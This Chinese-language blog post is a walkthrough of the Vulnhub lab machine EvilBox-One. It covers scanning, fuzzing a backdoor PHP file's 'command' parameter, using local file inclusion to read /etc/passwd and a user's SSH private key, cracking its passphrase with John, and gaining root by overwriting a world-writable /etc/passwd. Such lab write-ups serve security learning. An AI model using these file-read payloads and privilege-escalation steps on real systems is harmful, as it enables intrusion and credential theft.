<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Machines Name：EvilBox-One Difficulty：easy 部署使用 Virtualbox 直接导入 ova 文件即可  信息收集确定目标 ip 及端口开放情况 nmap 扫描本地或者直接看靶机中显示的 ip 我本机是 192.168.1.0&#x2F;24 网段 靶机是 nat 模式 1nmap -sS -P0 192.168.1.0&#x2F;24  确定目标 ip 和开放端口">
<meta property="og:type" content="article">
<meta property="og:title" content="Vulnhub - EvilBox-One WriteUp">
<meta property="og:url" content="http://example.com/2020/09/16/EvilBox-One/index.html">
<meta property="og:site_name" content="Brich">
<meta property="og:description" content="Machines Name：EvilBox-One Difficulty：easy 部署使用 Virtualbox 直接导入 ova 文件即可  信息收集确定目标 ip 及端口开放情况 nmap 扫描本地或者直接看靶机中显示的 ip 我本机是 192.168.1.0&#x2F;24 网段 靶机是 nat 模式 1nmap -sS -P0 192.168.1.0&#x2F;24  确定目标 ip 和开放端口">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/09/6ae3d4cb07022250.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/09/b2ac0db1ffdabe1c.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/09/c97d9e9be21c968b.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630669099/4_katzs1.png">
<meta property="og:image" content="https://s3.bmp.ovh/imgs/2021/09/82c38346e0db8558.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630671885/6_cbru0c.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630729976/15_lmb8lz.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630729976/16_t635ua.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630674306/7_rgd4pc.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630674706/8_dhbc1e.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630727320/9_nooema.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630727319/10_vjfybi.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630729367/12_jt2j3i.png">
<meta property="og:image" content="https://res.cloudinary.com/lin1109/image/upload/v1630729365/13_umsviw.png">
<meta property="article:published_time" content="2020-09-16T08:07:26.000Z">
<meta property="article:modified_time" content="2022-03-05T07:30:48.408Z">
<meta property="article:author" content="lin">
<meta property="article:tag" content="Vulnhub Machines">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s3.bmp.ovh/imgs/2021/09/6ae3d4cb07022250.png">
    
    
      
        
          <link rel="shortcut icon" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
      
        
          <link rel="icon" type="image/png" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="https://typro-1304950244.cos.ap-shanghai.myqcloud.com/img/%E7%9B%86%E6%A0%BD19.png">
        
      
    
    <!-- title -->
    <title>Vulnhub - EvilBox-One WriteUp</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2020/09/18/msfcs/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2020/08/15/cs-cdn/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2020/09/16/EvilBox-One/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2020/09/16/EvilBox-One/&text=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2020/09/16/EvilBox-One/&is_video=false&description=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Vulnhub - EvilBox-One WriteUp&body=Check out this article: http://example.com/2020/09/16/EvilBox-One/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2020/09/16/EvilBox-One/&name=Vulnhub - EvilBox-One WriteUp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2020/09/16/EvilBox-One/&t=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E7%BD%B2"><span class="toc-number">1.</span> <span class="toc-text">部署</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">3.</span> <span class="toc-text">攻击过程</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Vulnhub - EvilBox-One WriteUp
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">lin</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-09-16T08:07:26.000Z" itemprop="datePublished">2020-09-16</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Vulnhub-Machines/" rel="tag">Vulnhub Machines</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>Machines Name：EvilBox-One</p>
<p>Difficulty：easy</p>
<h2 id="部署"><a href="#部署" class="headerlink" title="部署"></a>部署</h2><p>使用 Virtualbox 直接导入 ova 文件即可</p>
<p><img src="https://s3.bmp.ovh/imgs/2021/09/6ae3d4cb07022250.png"></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>确定目标 ip 及端口开放情况</strong></p>
<p>nmap 扫描本地或者直接看靶机中显示的 ip</p>
<p>我本机是 192.168.1.0&#x2F;24 网段 靶机是 nat 模式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -P0 192.168.1.0/24</span><br></pre></td></tr></table></figure>

<p>确定目标 ip 和开放端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Nmap scan report for 192.168.1.21</span><br><span class="line">Host is up (0.0063s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line">MAC Address: 08:00:27:4A:54:A8 (Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure>

<p>访问 80 端口发现是 Apache 默认页</p>
<p><img src="https://s3.bmp.ovh/imgs/2021/09/b2ac0db1ffdabe1c.png"></p>
<p>什么都没有的状况下只能用 dirsearch 扫一遍目录了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://192.168.1.21/</span><br></pre></td></tr></table></figure>

<p>发现存在一个 secret 目录</p>
<p><img src="https://s3.bmp.ovh/imgs/2021/09/c97d9e9be21c968b.png"></p>
<p>访问 &#x2F;secret&#x2F;index.html 和 secret &#x2F; 都是空页面 只能继续扫 secret 下的目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http://192.168.1.21/secret</span><br></pre></td></tr></table></figure>

<p>发现存在 evil.php 文件 (这里刚开始使用默认字典没扫出来、换了字典才扫出来的)</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630669099/4_katzs1.png"></p>
<p>走到这路又走窄了，发现一个 evil.php 文件，猜测可能是一个后门？ Fuzz 一波 get 参数看看</p>
<p>这里使用一个叫 ffuf 的模糊测试工具</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffuf -c -u &quot;http://192.168.1.21/secret/evil.php?FUZZ=/etc/passwd&quot;  -w ./list.txt -fs 0	#list.txt是字典  -fs 0 过滤响应包大小为0的返回 -c 颜色区分显示</span><br></pre></td></tr></table></figure>

<p>发现存在一个 Get 参数 command</p>
<p><img src="https://s3.bmp.ovh/imgs/2021/09/82c38346e0db8558.png"></p>
<p>访问 &#x2F;secret&#x2F;evil.php?command&#x3D;&#x2F;etc&#x2F;passwd 发现返回了 &#x2F;etc&#x2F;passwd 文件的内容 可能是任意文件包含也可能是任意文件读取</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630671885/6_cbru0c.png"></p>
<p>发现一个 mowree 用户 并且知道用户家目录路径</p>
<p>尝试包含 &#x2F;etc&#x2F;shadow 文件 失败了 也没发现其它什么东西</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/convert.base64-encode/resource=evil.php					#使用php伪协议读取一下evil.php文件</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630729976/15_lmb8lz.png"></p>
<p>返回 base64 编码数据 解码 base64 evil.php 存在任意文件包含</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630729976/16_t635ua.png"></p>
<p>如果 PHP 配置 “allow_url_open” 和 “allow_url_include” 为 True，那么可以进行 RFI (远程文件包含) 执行后门，这里试了不行。</p>
<h2 id="攻击过程"><a href="#攻击过程" class="headerlink" title="攻击过程"></a>攻击过程</h2><p>综合以上信息，唯一思路就是找一找敏感信息了，比如配置文件、ssh 公钥、私钥之类的，可能存在密码的文件</p>
<p>从 mowree 这个用户入手 fuzz 一波</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffuf -c -u &quot;http://192.168.1.21/secret/evil.php?command=/home/mowree/FUZZ&quot;  -w ./list1.txt</span><br></pre></td></tr></table></figure>

<p>发现 ssh 公钥和私钥信息</p>
<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630674306/7_rgd4pc.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.21/secret/evil.php?command=/home/mowree/.ssh/id_rsa #私钥</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630674706/8_dhbc1e.png"></p>
<p><strong>破解私钥密码</strong></p>
<p>这里使用一款工具 John</p>
<p>先将私钥转换成 hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./ssh2john.py id_rsa &gt; rsacrack</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630727320/9_nooema.png"></p>
<p>使用 john 进行破解</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john rsacrack				#得到私钥口令unicorn</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630727319/10_vjfybi.png"></p>
<p><strong>ssh 远程连接</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh mowree@192.168.1.21 -i id_rsa</span><br></pre></td></tr></table></figure>



<p><strong>权限提升</strong></p>
<p>&#x2F;etc&#x2F;passwd 文件全部用户可读可写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mowree@EvilBoxOne:~$ ls -l /etc/passwd</span><br><span class="line">-rw-rw-rw- 1 root root 1398 Aug 16 13:20 /etc/passwd</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash   #&quot;x&quot;表示示用户密码的哈希值存储在/etc/shadow文件中 删除X可以删除root的密码但是这里不行</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</span><br><span class="line">sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br></pre></td></tr></table></figure>

<p>我们生成一个密码替换 root 的密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 toor  #密码为toor的哈希 $1$./wxeDKk$m0criiK.xH6aLYNVagRmS.</span><br></pre></td></tr></table></figure>

<p>编辑 &#x2F;etc&#x2F;passwd 文件</p>
<p>靶机 vim 有点问题 测试了一下存在 nano 用 nano 编辑 &#x2F;etc&#x2F;passwd 文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nano /etc/passwd		#ctrl+O 保存退出</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630729367/12_jt2j3i.png"></p>
<p>切换 root 用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">su -l root  		#输入我们替换的密码toor</span><br></pre></td></tr></table></figure>

<p><img src="https://res.cloudinary.com/lin1109/image/upload/v1630729365/13_umsviw.png"></p>
<p>至此整个靶机通关</p>

  </div>
</article>






        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/vlog/">vlog</a></li>
         
          <li><a href="/gallery/">Photo</a></li>
         
          <li><a href="/friends/">Friends</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E7%BD%B2"><span class="toc-number">1.</span> <span class="toc-text">部署</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E8%BF%87%E7%A8%8B"><span class="toc-number">3.</span> <span class="toc-text">攻击过程</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2020/09/16/EvilBox-One/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2020/09/16/EvilBox-One/&text=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2020/09/16/EvilBox-One/&is_video=false&description=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Vulnhub - EvilBox-One WriteUp&body=Check out this article: http://example.com/2020/09/16/EvilBox-One/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2020/09/16/EvilBox-One/&title=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2020/09/16/EvilBox-One/&name=Vulnhub - EvilBox-One WriteUp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2020/09/16/EvilBox-One/&t=Vulnhub - EvilBox-One WriteUp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2022
    lin
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/vlog/">vlog</a></li><!--
     --><!--
       --><li><a href="/gallery/">Photo</a></li><!--
     --><!--
       --><li><a href="/friends/">Friends</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: 'Ku71Pva4EFeKIH5y64LCYVwp-gzGzoHsz',
            appKey: 'wqnsWKV8eVHemIwCa9vo9vRg',
            placeholder: '快来评论一下吧',
            avatar: 'robohash'
        })
    </script>

    
<!-- utterances Comments -->



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"superSample":2,"width":200,"height":350,"position":"right","hOffset":0,"vOffset":-20},"mobile":{"show":false,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
